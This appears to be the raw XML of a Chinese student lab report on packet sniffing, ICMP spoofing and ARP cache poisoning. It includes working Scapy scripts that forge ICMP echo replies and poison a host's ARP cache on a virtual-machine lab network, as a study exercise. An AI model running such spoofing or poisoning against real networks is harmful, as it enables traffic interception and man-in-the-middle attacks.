            <wp:extent cx="5274310" cy="5962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2591" w14:textId="77777777" w:rsidR="003E2B80" w:rsidRDefault="003E2B80" w:rsidP="000B534D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="579A8D6A" w14:textId="009E5209" w:rsidR="00031460" w:rsidRDefault="00031460" w:rsidP="000B534D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00031460">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>Task</w:t>
      </w:r>
      <w:r w:rsidR="003E2B80">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>1.</w:t>
      </w:r>
      <w:r w:rsidRPr="00031460">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="00031460">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B797442" w14:textId="24799648" w:rsidR="009D27BA" w:rsidRDefault="009D27BA" w:rsidP="009D27BA">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>代码如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67870213" w14:textId="77777777" w:rsidR="009D27BA" w:rsidRDefault="009D27BA" w:rsidP="009D27BA"/>
    <w:p w14:paraId="0D90788F" w14:textId="77777777" w:rsidR="0077087C" w:rsidRDefault="0077087C" w:rsidP="0077087C">
      <w:r>
        <w:t xml:space="preserve">#!/usr/bin/python3 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EC59863" w14:textId="3BE50D9A" w:rsidR="0077087C" w:rsidRDefault="0077087C" w:rsidP="0077087C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5D74052D" w14:textId="77777777" w:rsidR="0077087C" w:rsidRDefault="0077087C" w:rsidP="0077087C">
      <w:r>
        <w:t xml:space="preserve">for </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> in range(1,32):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A2E821B" w14:textId="77777777" w:rsidR="0077087C" w:rsidRDefault="0077087C" w:rsidP="0077087C">
      <w:r>
        <w:tab/>
        <w:t>send(IP(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dst</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>="</w:t>
      </w:r>
      <w:bookmarkStart w:id="2" w:name="OLE_LINK3"/>
      <w:bookmarkStart w:id="3" w:name="OLE_LINK4"/>
      <w:r>
        <w:t>www.seu.edu.cn</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
      <w:bookmarkEnd w:id="3"/>
      <w:r>
        <w:t>",ttl=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>)/ICMP())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14C41C92" w14:textId="77777777" w:rsidR="0077087C" w:rsidRDefault="0077087C" w:rsidP="009D27BA"/>
    <w:p w14:paraId="3A1C4BAB" w14:textId="148D88C1" w:rsidR="009D27BA" w:rsidRDefault="009D27BA" w:rsidP="009D27BA">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>以</w:t>
      </w:r>
      <w:r w:rsidR="0077087C" w:rsidRPr="0077087C">
        <w:t>www.seu.edu.cn为例进行</w:t>
      </w:r>
      <w:r w:rsidR="0077087C" w:rsidRPr="0077087C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>距离测量，</w:t>
      </w:r>
      <w:r w:rsidR="0077087C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通过</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="0077087C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>wireshark</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="0077087C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>抓包可知</w:t>
      </w:r>
      <w:r w:rsidR="0077087C" w:rsidRPr="0077087C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>距离为8</w:t>
      </w:r>
      <w:r w:rsidR="0077087C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>跳</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16068567" w14:textId="2165A55C" w:rsidR="009D27BA" w:rsidRPr="009D27BA" w:rsidRDefault="0077087C" w:rsidP="009D27BA">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="53858114" wp14:editId="6011EFEF">
            <wp:extent cx="5274310" cy="11004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9AE" w14:textId="77777777" w:rsidR="00261CC7" w:rsidRDefault="00261CC7" w:rsidP="000B534D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4DF96F7E" w14:textId="27F4EDB4" w:rsidR="00252F92" w:rsidRDefault="00252F92" w:rsidP="000B534D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00252F92">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>Task</w:t>
      </w:r>
      <w:r w:rsidR="00586290">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>1.</w:t>
      </w:r>
      <w:r w:rsidRPr="00252F92">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidRPr="00252F92">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D0D2D94" w14:textId="59B8603D" w:rsidR="00390B5D" w:rsidRDefault="00261CC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取三个虚拟机，虚拟机A：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>192.168.19.142</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>，虚拟机B：1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>92.168.19.143</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>，虚拟机X：1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>92.168.19.138</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1150F647" w14:textId="5F17E573" w:rsidR="00261CC7" w:rsidRDefault="00261CC7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首先让A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X</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="00AA69D5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>结果显示能够ping通。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CA2916D" w14:textId="4741ABA1" w:rsidR="00261CC7" w:rsidRDefault="00261CC7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5BA1C13" wp14:editId="38C431D4">
            <wp:extent cx="5274310" cy="8528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04AE" w14:textId="045B9D70" w:rsidR="00AA69D5" w:rsidRDefault="00AA69D5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先尝试用虚拟机B捕获I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报文，此时B中code如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D3734C9" w14:textId="77777777" w:rsidR="00AA69D5" w:rsidRPr="00AA69D5" w:rsidRDefault="00AA69D5" w:rsidP="00AA69D5">
      <w:r w:rsidRPr="00AA69D5">
        <w:t xml:space="preserve">#!/usr/bin/python3 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29F0F43D" w14:textId="77777777" w:rsidR="00AA69D5" w:rsidRPr="00AA69D5" w:rsidRDefault="00AA69D5" w:rsidP="00AA69D5">
      <w:r w:rsidRPr="00AA69D5">
        <w:t xml:space="preserve">from </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AA69D5">
        <w:t>scapy.all</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AA69D5">
        <w:t xml:space="preserve"> import *</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BD68D3F" w14:textId="77777777" w:rsidR="00AA69D5" w:rsidRPr="00AA69D5" w:rsidRDefault="00AA69D5" w:rsidP="00AA69D5">
      <w:r w:rsidRPr="00AA69D5">
        <w:t xml:space="preserve">def </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AA69D5">
        <w:t>print_pkt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AA69D5">
        <w:t xml:space="preserve">(pkt): </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10F56F80" w14:textId="77777777" w:rsidR="00AA69D5" w:rsidRPr="00AA69D5" w:rsidRDefault="00AA69D5" w:rsidP="00AA69D5">
      <w:r w:rsidRPr="00AA69D5">
        <w:tab/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AA69D5">
        <w:t>pkt.show</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AA69D5">
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45C3FB26" w14:textId="32C32B29" w:rsidR="00AA69D5" w:rsidRPr="00AA69D5" w:rsidRDefault="00AA69D5" w:rsidP="00AA69D5">
      <w:r w:rsidRPr="00AA69D5">
        <w:t>pkt=sniff(filter='</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AA69D5">
        <w:t>icmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AA69D5">
        <w:t>',prn=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AA69D5">
        <w:t>print_pkt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AA69D5">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F23B104" w14:textId="076189ED" w:rsidR="00AA69D5" w:rsidRPr="00AA69D5" w:rsidRDefault="00AA69D5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如下图显示，用A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ping</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> X </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>的同时运行B中的code，能够成功捕获A发往X的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>I</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>CMP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>报文：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16BE9928" w14:textId="5025F7F9" w:rsidR="00AA69D5" w:rsidRDefault="00AA69D5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1BC50D34" wp14:editId="06685FE3">
            <wp:extent cx="5274310" cy="35471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F781" w14:textId="566A984B" w:rsidR="004A398F" w:rsidRDefault="004A398F" w:rsidP="000B534D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再尝试伪造报文，虚拟机B中的伪造代码如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DCF687E" w14:textId="338AD1B1" w:rsidR="004A398F" w:rsidRPr="004A398F" w:rsidRDefault="004A398F" w:rsidP="004A398F">
      <w:r w:rsidRPr="004A398F">
        <w:t xml:space="preserve">from </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004A398F">
        <w:t>scapy.all</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004A398F">
        <w:t xml:space="preserve"> import *</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78E89BBC" w14:textId="77777777" w:rsidR="004A398F" w:rsidRPr="004A398F" w:rsidRDefault="004A398F" w:rsidP="004A398F">
      <w:r w:rsidRPr="004A398F">
        <w:t xml:space="preserve">def </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004A398F">
        <w:t>print_pkt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004A398F">
        <w:t>(pkt):</w:t>
      </w:r>
      <w:r w:rsidRPr="004A398F">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="004A398F">
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="6542FCEF" w14:textId="21086B50" w:rsidR="004A398F" w:rsidRPr="004A398F" w:rsidRDefault="004A398F" w:rsidP="004A398F">
      <w:r w:rsidRPr="004A398F">
        <w:t>send(IP(src=pkt[IP].dst,dst=pkt[IP].src)/ICMP(type="echo-reply",code =0,id=pkt[ICMP].</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004A398F">
        <w:t>id,seq</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004A398F">
        <w:t xml:space="preserve"> = pkt[ICMP].seq))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59285311" w14:textId="5B099169" w:rsidR="004A398F" w:rsidRDefault="004A398F" w:rsidP="004A398F">
      <w:r w:rsidRPr="004A398F">
        <w:t>pkt = sniff(filter='</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004A398F">
        <w:t>icmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004A398F">
        <w:t>[</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004A398F">
        <w:t>icmptype</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004A398F">
        <w:t xml:space="preserve">] == </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004A398F">
        <w:t>icmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004A398F">
        <w:t>-echo', prn=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004A398F">
        <w:t>print_pkt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004A398F">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="244E95ED" w14:textId="77777777" w:rsidR="004A398F" w:rsidRDefault="004A398F" w:rsidP="004A398F"/>
    <w:p w14:paraId="191C4F93" w14:textId="0139E109" w:rsidR="004A398F" w:rsidRPr="004A398F" w:rsidRDefault="004A398F" w:rsidP="004A398F">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>关闭虚拟机X，运行伪造应答报文的代码，再次使用虚拟机A</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ping虚拟机</w:t>
      </w:r>
      <w:r>
        <w:t>X</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，可见A发出6次请求均收到了假的X虚拟机（虚拟机</w:t>
      </w:r>
      <w:r>
        <w:t>B</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）的回应，B中的程序发出了对应的6个应答报文，实验成功：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FB234FA" w14:textId="6427678E" w:rsidR="004A398F" w:rsidRDefault="004A398F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56BC9112" wp14:editId="1B163B41">
            <wp:extent cx="5019675" cy="7143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5BB5" w14:textId="570AC6BF" w:rsidR="00AA69D5" w:rsidRDefault="004A398F" w:rsidP="000B534D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377649A" wp14:editId="5B9A7922">
            <wp:extent cx="5274310" cy="23380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06B" w14:textId="6FD5B06C" w:rsidR="00D87386" w:rsidRPr="00D87386" w:rsidRDefault="004A398F" w:rsidP="000B534D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73DE1731" wp14:editId="55C838A3">
            <wp:extent cx="5274310" cy="1991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408" w14:textId="77777777" w:rsidR="004A398F" w:rsidRDefault="004A398F" w:rsidP="0033484C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7F38953B" w14:textId="228B7059" w:rsidR="00383334" w:rsidRDefault="004A398F" w:rsidP="0033484C">
      <w:pPr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t>II</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>．</w:t>
      </w:r>
      <w:r w:rsidRPr="004A398F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>ARP Cache Poisoning Attack Lab</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16069B31" w14:textId="1C507575" w:rsidR="007B5106" w:rsidRDefault="007B5106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 w:rsidR="00271210">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59F5858B" w14:textId="53898B5A" w:rsidR="00F96629" w:rsidRDefault="00F96629" w:rsidP="0067699E">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>虚拟机M的代码如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EB3E8DD" w14:textId="77777777" w:rsidR="00F96629" w:rsidRDefault="00F96629" w:rsidP="0067699E"/>
    <w:p w14:paraId="44C4D969" w14:textId="47A32CAB" w:rsidR="0067699E" w:rsidRPr="0067699E" w:rsidRDefault="0067699E" w:rsidP="0067699E">
      <w:r w:rsidRPr="0067699E">
        <w:t xml:space="preserve">#!/usr/bin/python3 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ED57446" w14:textId="77777777" w:rsidR="0067699E" w:rsidRPr="0067699E" w:rsidRDefault="0067699E" w:rsidP="0067699E">
      <w:r w:rsidRPr="0067699E">
        <w:t xml:space="preserve">from </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0067699E">
        <w:t>scapy.all</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0067699E">
        <w:t xml:space="preserve"> import *</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DDA872E" w14:textId="77777777" w:rsidR="0067699E" w:rsidRPr="0067699E" w:rsidRDefault="0067699E" w:rsidP="0067699E">
      <w:r w:rsidRPr="0067699E">
        <w:t>E = Ether(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0067699E">
        <w:t>src</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0067699E">
        <w:t xml:space="preserve">='00:0c:29:1c:41:c3',dst='FF:FF:FF:FF:FF:FF') </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7380E32C" w14:textId="335FC9E8" w:rsidR="0067699E" w:rsidRPr="0067699E" w:rsidRDefault="0067699E" w:rsidP="0067699E">
      <w:r w:rsidRPr="0067699E">
        <w:t>A=ARP(op=1,hwsrc='00:0c:29:1c:41:c3',psrc='192.168.19.138',hwdst='00:00:00:00:00:00',pdst='192.168.19.142')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32980BBE" w14:textId="77777777" w:rsidR="0067699E" w:rsidRPr="0067699E" w:rsidRDefault="0067699E" w:rsidP="0067699E">
      <w:r w:rsidRPr="0067699E">
        <w:t xml:space="preserve">pkt = E/A </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55B6B868" w14:textId="7CD19DB9" w:rsidR="0067699E" w:rsidRDefault="0067699E" w:rsidP="0067699E">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0067699E">
        <w:t>sendp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0067699E">
        <w:t>(pkt)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="109CB740" w14:textId="672EBB3C" w:rsidR="00F96629" w:rsidRDefault="00F96629" w:rsidP="0067699E"/>
    <w:p w14:paraId="06D1D45A" w14:textId="6BE052EC" w:rsidR="00F96629" w:rsidRPr="0067699E" w:rsidRDefault="00F96629" w:rsidP="0067699E">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>检查虚拟机A的</w:t>
      </w:r>
      <w:r>
        <w:t>ARP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>缓存表，发现1</w:t>
      </w:r>
      <w:r>
        <w:t>92.168.19.138</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对应的M</w:t>
      </w:r>
      <w:r>
        <w:t>AC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>地址已被换成虚拟机M的M</w:t>
      </w:r>
      <w:r>
        <w:t>AC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>地址，</w:t>
      </w:r>
      <w:r w:rsidR="009B4AC6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>因此</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>第一种方法有效：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C33FC11" w14:textId="22E0703A" w:rsidR="007B5106" w:rsidRDefault="0067699E" w:rsidP="0033484C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs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173E2B1A" wp14:editId="56E4A310">
            <wp:extent cx="5274310" cy="9467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60F0" w14:textId="77777777" w:rsidR="00D945E2" w:rsidRDefault="00D945E2" w:rsidP="0033484C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="69342131" w14:textId="08F9A29F" w:rsidR="00D945E2" w:rsidRDefault="00D945E2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 w:rsidR="009B4AC6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>1B</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66D43D5F" w14:textId="67FC6ED0" w:rsidR="00E07408" w:rsidRDefault="00E07408" w:rsidP="00E07408">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>首先重新使A获得正确的A</w:t>
      </w:r>
      <w:r>
        <w:t>RP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>缓存，随后运行虚拟机M代码如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39DF6DB7" w14:textId="77777777" w:rsidR="00E07408" w:rsidRDefault="00E07408" w:rsidP="00E07408"/>
    <w:p w14:paraId="1BE87306" w14:textId="0A5B2CD9" w:rsidR="00E07408" w:rsidRPr="00E07408" w:rsidRDefault="00E07408" w:rsidP="00E07408">
      <w:r w:rsidRPr="00E07408">
        <w:t xml:space="preserve">#!/usr/bin/python3 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F9176D6" w14:textId="77777777" w:rsidR="00E07408" w:rsidRPr="00E07408" w:rsidRDefault="00E07408" w:rsidP="00E07408">
      <w:r w:rsidRPr="00E07408">
        <w:t xml:space="preserve">from </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E07408">
        <w:t>scapy.all</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E07408">
        <w:t xml:space="preserve"> import *</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A88B86C" w14:textId="77777777" w:rsidR="00E07408" w:rsidRPr="00E07408" w:rsidRDefault="00E07408" w:rsidP="00E07408">
      <w:r w:rsidRPr="00E07408">
        <w:t>E = Ether(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E07408">
        <w:t>src</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E07408">
        <w:t xml:space="preserve">='00:0c:29:1c:41:c3',dst='00:0c:29:56:0c:82') </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A17E86A" w14:textId="6023D72D" w:rsidR="00E07408" w:rsidRPr="00E07408" w:rsidRDefault="00E07408" w:rsidP="00E07408">
      <w:r w:rsidRPr="00E07408">
        <w:t>A=ARP(op=2,hwsrc='00:0c:29:1c:41:c3',psrc='192.168.19.138',hwdst='00:0c:29:56:0c:82',pdst='192.168.19.144')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="023C1AE8" w14:textId="77777777" w:rsidR="00E07408" w:rsidRPr="00E07408" w:rsidRDefault="00E07408" w:rsidP="00E07408">
      <w:r w:rsidRPr="00E07408">
        <w:t xml:space="preserve">pkt = E/A </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D18BE87" w14:textId="4B80D880" w:rsidR="00E07408" w:rsidRDefault="00E07408" w:rsidP="00E07408">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E07408">
        <w:t>sendp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E07408">
        <w:t>(pkt)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28FE8A3B" w14:textId="4809CA35" w:rsidR="00E07408" w:rsidRDefault="00E07408" w:rsidP="00E07408"/>
